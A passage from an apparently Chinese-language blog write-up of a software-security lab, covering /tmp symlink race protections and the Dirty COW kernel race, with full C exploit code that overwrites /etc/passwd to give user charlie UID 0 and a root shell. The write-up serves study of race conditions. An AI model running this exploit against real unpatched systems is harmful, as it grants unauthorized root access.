<p><strong>这个保护只针对tmp文件夹下的符号链接。如果是其他文件夹下面，依然可以成功。</strong>推测可能在现实某个场景中，用户只能访问/tmp路径。</p>
<h2 id="保护措施"><a href="#保护措施" class="headerlink" title="保护措施"></a>保护措施</h2><p>其实task3讲了一些linux的保护措施。其实也有一些别的，这里来总结一下</p>
<ol>
<li>ubuntu的在全局可写文件夹中是否能够使用符号链接的保护。(task3.b)这使得我们在部分情况下不能对有粘滞bit的文件夹中的符号链接做解引用，这样我们就不能在/tmp里面放符号链接了。 ==为什么只限制/tmp?==</li>
</ol>
<p>具体来说，粘滞符号链接保护如下所示。</p>
<table>
<thead>
<tr>
<th>执行者</th>
<th>目录所有者</th>
<th>符号链接所有者</th>
<th>是否可以访问</th>
</tr>
</thead>
<tbody><tr>
<td>seed</td>
<td>seed</td>
<td>seed</td>
<td>可以</td>
</tr>
<tr>
<td>seed</td>
<td>seed</td>
<td>root</td>
<td>不可以</td>
</tr>
<tr>
<td>seed</td>
<td>root</td>
<td>seed</td>
<td>可以</td>
</tr>
<tr>
<td>seed</td>
<td>root</td>
<td>root</td>
<td>可以</td>
</tr>
<tr>
<td>root</td>
<td>seed</td>
<td>seed</td>
<td>可以</td>
</tr>
<tr>
<td>root</td>
<td>seed</td>
<td>root</td>
<td>可以</td>
</tr>
<tr>
<td><strong>root</strong></td>
<td><strong>root</strong></td>
<td><strong>seed</strong></td>
<td><strong>不可以</strong></td>
</tr>
<tr>
<td>root</td>
<td>root</td>
<td>root</td>
<td>可以</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<p>(黑体部分为，如果我们创建了一个root的/tmp/XYZ时，攻击不能成功的原因。我们不能解引用此符号链接文件了)</p>
<ol start="2">
<li><strong>把检查和使用的操作原子化</strong>。如下面的代码，可以实现检查文件和打开的原子化操作。</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f = open(file, O_CREAT | O_EXCL);</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>每次open时，<strong>检查read uid而不是effective uid</strong>（就相当于上面的seteuid自动执行了）但是这个选项在linux中还没有。</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">f = open(file, O_WRITE | O_REAL_USER_ID);</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>利用access和open在代码中多次打开同一个文件，并且确保在所有被打开的文件<strong>全部相同的时候</strong>，再打开文件。因此攻击者必须确保所有文件同时竞争成功，才能完成攻击。</li>
</ol>
<h1 id="dirty-COW"><a href="#dirty-COW" class="headerlink" title="dirty COW"></a>dirty COW</h1><p>这是第二个条件竞争漏洞。</p>
<h2 id="task1-1"><a href="#task1-1" class="headerlink" title="task1.1"></a>task1.1</h2><p>我们用和pdf中完全一样的输入序列。创建一个用户不可写入的文件。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504153040487.png" alt="image-20220504153040487"></p>
<h2 id="task1-2"><a href="#task1-2" class="headerlink" title="task1.2"></a>task1.2</h2><p>我们首先以只读的方式打开文件(从之前的cat可以看出，这也是可行的)并映射一段内存出来，用来储存文件内容。在这之后，我们分为两步进行这次攻击。</p>
<h3 id="write-thread"><a href="#write-thread" class="headerlink" title="write thread"></a>write thread</h3><p>write首先去内存中找到我们的目标(222222)的偏移(利用strstr)，之后利用fseek找到所在位置。并且mmap的内存中写入数据。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> *<span class="title function_">writeThread</span><span class="params">(<span class="type">void</span> *arg)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> *content= <span class="string">&quot;******&quot;</span>;</span><br><span class="line">  <span class="type">off_t</span> offset = (<span class="type">off_t</span>) arg;</span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> f=open(<span class="string">&quot;/proc/self/mem&quot;</span>, O_RDWR);</span><br><span class="line">  <span class="keyword">while</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    <span class="comment">// Move the file pointer to the corresponding position.</span></span><br><span class="line">    lseek(f, offset, SEEK_SET);</span><br><span class="line">    <span class="comment">// Write to the memory.</span></span><br><span class="line">    write(f, content, <span class="built_in">strlen</span>(content));</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="madvise-thread"><a href="#madvise-thread" class="headerlink" title="madvise thread"></a>madvise thread</h3><p>这个线程主要调用<code>madvise</code>。看到man madvise中MADV_DONTNEED的含义。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504160313380.png" alt="image-20220504160313380"></p>
<p>这个意思是，当前这个进程已经用好了这一片内存，在最近的一段时间内不需要在使用了。操作系统可以把这一片内存释放了。</p>
<h3 id="如何成功"><a href="#如何成功" class="headerlink" title="如何成功"></a>如何成功</h3><p>当write的syscall发生时，如果我们调用了madvise，就会把write现在正在写的页表丢弃，而如果现在又切换回write，write现在在写的页表就变成了目标文件的内容，也就是只读文件的内容。具体来说，漏洞触发原理和copy on write机制相关。</p>
<p>首先是这两句。我们把只读文件以私有映射的方式映射到mmap出来的一片内存上。注意<code>MAP_PRIVATE</code>的flag表示我们并不直接对源文件写入，而是创建一片新的内存。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Open the target file in the read-only mode.</span></span><br><span class="line"><span class="type">int</span> f=open(<span class="string">&quot;/zzz&quot;</span>, O_RDONLY);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Map the file to COW memory using MAP_PRIVATE.</span></span><br><span class="line">fstat(f, &amp;st);</span><br><span class="line">file_size = st.st_size;</span><br><span class="line"><span class="built_in">map</span>=mmap(<span class="literal">NULL</span>, file_size, PROT_READ, MAP_PRIVATE, f, <span class="number">0</span>);</span><br></pre></td></tr></table></figure>

<p>在创造了这样一篇内存之后，由于复制需要时间，操作系统并不会直接把这一片内容分配一个页面出来，而是等到用户要做修改的时候再复制用户写入的内容，并改变用户进程页表的项目。这样的做法叫做<code>copy on write</code>。</p>
<p>如果用户丢弃了这样一片空间(使用madvise)，那么页表将会被操作系统回收，之前mmap出来的地址将被<strong>重新指向写入之前的，也就是没有复制时候的地址</strong>。(最关键的地方其实在这里，重新指向写入之前的地址)</p>
<p>如果我们能够想办法在调用<code>write</code>之后，调用<code>madvise</code>释放空间，之后再回到<code>write</code>，此时write指向的页面就是只读文件所在的页面，这样就能造成对只读文件的修改了。流程如下图所示。</p>
<p><img src="/2022/05/04/software-security-lab4/cow.png" alt="image-20220504160313380"></p>
<blockquote>
<p>思考：为什么写入内存的时候，还是没有检查是否可写呢?</p>
<p>write进行私有写的过程中，一共经过了三步1. 对映射的物理内存做了一份拷贝 2.更新页表，让虚拟内存指向新创建的物理内存 3.写入内存</p>
<p>因为write如果在已知当前内存是COW类型时，会申请新页面、切换页表的过程(也就是1，2)。而最后一部写入内存时，就不会再检查了。因此，我们可以在最后蓝色方块之前，加入一个条件竞争。一旦madvice成功，就使得写入的实际内存变为/etc/passwd。</p>
<p>本质上来说，问题还是系统调用write不是原子的。</p>
</blockquote>
<p>可以看到，运行<code>cow_attack</code>之后，很快只读文件就被修改了。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504181416634.png" alt="image-20220504181416634"></p>
<h2 id="获得root权限"><a href="#获得root权限" class="headerlink" title="获得root权限"></a>获得root权限</h2><p>我们首先创建charlie账户，如下所示。可以看到<code>charlie</code>只有一个user权限。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504181542874.png" alt="image-20220504181542874"></p>
<p>接下来尝试通过dirty cow攻击使得charlie拥有root权限。我们要做的只是修改上面”222222”字符串为”1001”，并且修改的目标为”0”即可，同时把打开的只读文件改为<code>/etc/passwd</code>。这样我们最终将会把<code>charlie</code>的userID设置为0也就是root。</p>
<p><img src="/2022/05/04/software-security-lab4/image-20220504202325032.png" alt="image-20220504202325032"></p>
<p>如上所示，我们就获得了一个root的shell。</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><p>最重要的就是查找<code>charlie:x:1001</code>字符串，并将其替换为<code>charlie:x:0000</code>。注意不能只把<code>1001</code>改为<code>0</code>。这样会导致只能改第一位。也就是把<code>charlie:x:1001</code>改成了<code>charlie:x:0001</code>。这样是不能起到攻击效果的。要改一个完整的才行。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> *<span class="built_in">map</span>;</span><br><span class="line"><span class="type">void</span> *<span class="title function_">writeThread</span><span class="params">(<span class="type">void</span> *arg)</span>;</span><br><span class="line"><span class="type">void</span> *<span class="title function_">madviseThread</span><span class="params">(<span class="type">void</span> *arg)</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">pthread_t</span> pth1,pth2;</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">stat</span> <span class="title">st</span>;</span></span><br><span class="line">  <span class="type">int</span> file_size;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Open the target file in the read-only mode.</span></span><br><span class="line">  <span class="type">int</span> f=open(<span class="string">&quot;/etc/passwd&quot;</span>, O_RDONLY);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Map the file to COW memory using MAP_PRIVATE.</span></span><br><span class="line">  fstat(f, &amp;st);</span><br><span class="line">  file_size = st.st_size;</span><br><span class="line">  <span class="built_in">map</span>=mmap(<span class="literal">NULL</span>, file_size, PROT_READ, MAP_PRIVATE, f, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Find the position of the target area</span></span><br><span class="line">  <span class="type">char</span> *position = <span class="built_in">strstr</span>(<span class="built_in">map</span>, <span class="string">&quot;charlie:x:1001&quot;</span>);                        </span><br><span class="line"></span><br><span class="line">  <span class="comment">// We have to do the attack using two threads.</span></span><br><span class="line">  pthread_create(&amp;pth1, <span class="literal">NULL</span>, madviseThread, (<span class="type">void</span>  *)file_size); </span><br><span class="line">  pthread_create(&amp;pth2, <span class="literal">NULL</span>, writeThread, position);             </span><br><span class="line"></span><br><span class="line">  <span class="comment">// Wait for the threads to finish.</span></span><br><span class="line">  pthread_join(pth1, <span class="literal">NULL</span>);</span><br><span class="line">  pthread_join(pth2, <span class="literal">NULL</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> *<span class="title function_">writeThread</span><span class="params">(<span class="type">void</span> *arg)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> *content= <span class="string">&quot;charlie:x:0000&quot;</span>;</span><br><span class="line">  <span class="type">off_t</span> offset = (<span class="type">off_t</span>) arg;</span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> f=open(<span class="string">&quot;/proc/self/mem&quot;</span>, O_RDWR);</span><br><span class="line">  <span class="keyword">while</span>(<span class="number">1</span>) &#123;</span><br><span class="line">    <span class="comment">// Move the file pointer to the corresponding position.</span></span><br><span class="line">    lseek(f, offset, SEEK_SET);</span><br><span class="line">    <span class="comment">// Write to the memory.</span></span><br><span class="line">    write(f, content, <span class="built_in">strlen</span>(content));</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> *<span class="title function_">madviseThread</span><span class="params">(<span class="type">void</span> *arg)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> file_size = (<span class="type">int</span>) arg;</span><br><span class="line">  <span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">      madvise(<span class="built_in">map</span>, file_size, MADV_DONTNEED);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2022/05/04/software-security-lab4/">software-security-lab4</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页"></a></p>
        <p><span>发布时间:</span>2022-05-04, 08:27:47</p>
        <p><span>最后更新:</span>2023-01-19, 12:57:22</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2022/05/04/software-security-lab4/" title="software-security-lab4">https://nicholas-wei.github.io/2022/05/04/software-security-lab4/</a>
            <span class="copy-path" data-clipboard-text="原文: https://nicholas-wei.github.io/2022/05/04/software-security-lab4/　　作者: " title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2022/05/05/angstormCTF2022-pwn/">
                    angstormCTF2022_pwn
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2022/04/27/pwnhub2022/">
                    pwnhub2022_easyrop
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#race-condition"><span class="toc-number">1.</span> <span class="toc-text">race_condition</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#task1"><span class="toc-number">1.1.</span> <span class="toc-text">task1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#task2"><span class="toc-number">1.2.</span> <span class="toc-text">task2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#etc-passwd%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.2.1.</span> <span class="toc-text">&#x2F;etc&#x2F;passwd格式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#task2-A"><span class="toc-number">1.2.2.</span> <span class="toc-text">task2.A</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#task2-B"><span class="toc-number">1.2.3.</span> <span class="toc-text">task2.B</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#task2-C"><span class="toc-number">1.2.4.</span> <span class="toc-text">task2.C</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#task3-a"><span class="toc-number">1.3.</span> <span class="toc-text">task3.a</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#task3-b"><span class="toc-number">1.4.</span> <span class="toc-text">task3.b</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%9D%E6%8A%A4%E6%8E%AA%E6%96%BD"><span class="toc-number">1.5.</span> <span class="toc-text">保护措施</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#dirty-COW"><span class="toc-number">2.</span> <span class="toc-text">dirty COW</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#task1-1"><span class="toc-number">2.1.</span> <span class="toc-text">task1.1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#task1-2"><span class="toc-number">2.2.</span> <span class="toc-text">task1.2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#write-thread"><span class="toc-number">2.2.1.</span> <span class="toc-text">write thread</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#madvise-thread"><span class="toc-number">2.2.2.</span> <span class="toc-text">madvise thread</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E6%88%90%E5%8A%9F"><span class="toc-number">2.2.3.</span> <span class="toc-text">如何成功</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%BE%97root%E6%9D%83%E9%99%90"><span class="toc-number">2.3.</span> <span class="toc-text">获得root权限</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">2.3.1.</span> <span class="toc-text">exp</span></a></li></ol></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"software-security-lab4　| welc0me　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>






<!-- 
    
 -->


  
      <section id='comments' style='margin: 2em; padding: 2em; background: rgba(255, 255, 255, 0.5)'>
    <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
    <script src="https://unpkg.com/gitalk@latest/dist/gitalk.min.js"></script>
    <div id="gitalk-container"></div>
    <script type="text/javascript">
      var gitalk = new Gitalk({
        clientID: 'fb4ffdde2e800246e49f',
        clientSecret: 'b550860fb0906da0fc324e3c81448cd676b55f9e',
        repo: 'nicholas-wei.github.io',
        owner: 'nicholas-wei',
        admin: ['nicholas-wei'],
        id: window.location.pathname
      })
      gitalk.render('gitalk-container')
    </script>
  </section>
  




    <div class="scroll" id="post-nav-button">
        
            <a href="/2022/05/05/angstormCTF2022-pwn/" title="上一篇: angstormCTF2022_pwn">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2022/04/27/pwnhub2022/" title="下一篇: pwnhub2022_easyrop">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2023/08/18/satc-source/">satc_source</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/08/11/Emtaint-paper-reading/">Emtaint_paper_reading</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/08/01/angr-basic/">angr-basic</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/07/28/netgear-WNDR4500v2-buffer-overflow/">netgear-WNDR4500v2-buffer_overflow</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/05/03/decrypt-wechat-db/">decrypt-wechat-db</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/05/02/tamuctf-pwnme/">tamuctf-pwnme</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/03/20/ej/">ej</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/02/07/royal_ransomeware/">royal_randomeware analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/02/05/mirai/">mirai_botnet_analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/26/corctf2022-corchat/">corctf2022-corchat</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/24/bi0sctf-2023/">bi0sctf-2023</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/20/rwctf-tinyvm/">rwctf-tinyvm</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/01/19/wasm-pwn/">wasm-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/12/27/ics-pa1/">ics-pa</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/11/13/llvm-pass1/">llvm-pass1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/09/14/leetcode-1/">leetcode-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/28/dp/">dp</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/19/Directed-Grey-Box-Fuzzing-with-Provable-Path-Pruning/">Directed_Grey-Box_Fuzzing_with_Provable_Path_Pruning</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/13/Constraint-guided-Directed-Greybox-Fuzzing/">Constraint-guided_Directed_Greybox_Fuzzing</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/10/crafting-interpreters4/">crafting-interpreters4</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/07/crafting-interpreters3/">crafting-interpreters3</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/04/crafting-interpreters2/">crafting-interpreters2——scanning</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/08/02/house-of-cat/">house-of-cat</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/07/29/crafting-interpreters1/">crafting_interpreters 1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/07/28/dice2022-hope/">dice2022@hope</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/30/software-security-lab6/">software-security-lab6</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/18/software-security-lab5/">software-security-lab5</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/18/volgaCTF2022-pwn/">volgaCTF2022_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/08/pyjail/">pyjail</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/05/angstormCTF2022-pwn/">angstormCTF2022_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/05/04/software-security-lab4/">software-security-lab4</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/27/pwnhub2022/">pwnhub2022_easyrop</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/25/b01lersCTF2022-pwn/">b01lersCTF2022_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/15/hackpark2022-shiftycode/">hackpark2022_shiftycode</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/14/input_check_lab/">software-security-lab3</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/07/software-security-lab2/">software-security-lab2</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/07/matlab-2/">matlab-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/04/FuzzBuilder-src-understand/">FuzzBuilder_src_understand</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/04/SpaceHeroCTF2022-pwn-wp/">SpaceHeroCTF2022_pwn_wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/04/01/fb-bot-discord/">fb-bot_discord</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/31/matlab-1/">matlab-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/29/zer0pts2022-accountant/">zer0pts2022_accountant</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/17/fuzzing-6-grammer-fuzzing/">fuzzing-6-grammer_fuzzing</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/16/fuzzing-5-parallelize/">fuzzing-5-parallelize</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/15/fuzzing-4-code_coverage/">fuzzing-4</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/13/fuzzing-2/">fuzzing-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/09/software-security-lab1/">software-security_lab1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/09/fuzzing-1-gegeral-knowledge/">fuzzing-1-gegeral_knowledge</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/07/umdctf2022-pwn/">umdctf2022-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/06/kernel-6-HijackPrctl/">kernel-6-HijackPrctl</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/03/02/pwnable-re-alloc-revenge/">pwnable-re-alloc_revenge</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/28/SUSCTF2022-pwn/">SUSCTF2022-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/23/tqlctf-nemu/">tqlctf-nemu</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/23/fastbin-reverse-into-tcache/">fastbin-reverse-into-tcache</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/15/kernel-5-bypass-smep1/">kernel-5-bypass_smep1</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/14/pwnable-babystack/">pwnable-babystack</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/11/kernel-4-doubleFetch/">kernel-4-doubleFetch</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/07/tcache-stashing-unlink-attack/">tcache-stashing-unlink-attack</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/03/IO-file-vtable/">IO_file常见利用方法&原理(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/02/01/pwnable-realloc/">pwnable-realloc</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/31/kernel-3-UAF/">kernel-3-UAF</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/29/IO-file/">IO_file常见利用方法&原理(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/29/largebin-attack/">largebin-attack</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/28/hws2022%E5%86%AC%E4%BB%A4%E8%90%A5ctf/">hws2022冬令营入营赛pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/27/RWctf-2022-svme/">RWctf-2022-svme</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/24/kernel-2-stkof/">kernel-2-stkof</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/23/kernel-1-basic_knowledge/">kernel-1-basic_knowledge</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/22/Drangonctf2021-noflippidy/">Drangonctf2021-noflippidy</a></li><li class="post-list-item"><a class="post-list-link" href="/2022/01/21/dicectf2021-flippidy/">dicectf2021_flippidy</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2022-2023 nich0las
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
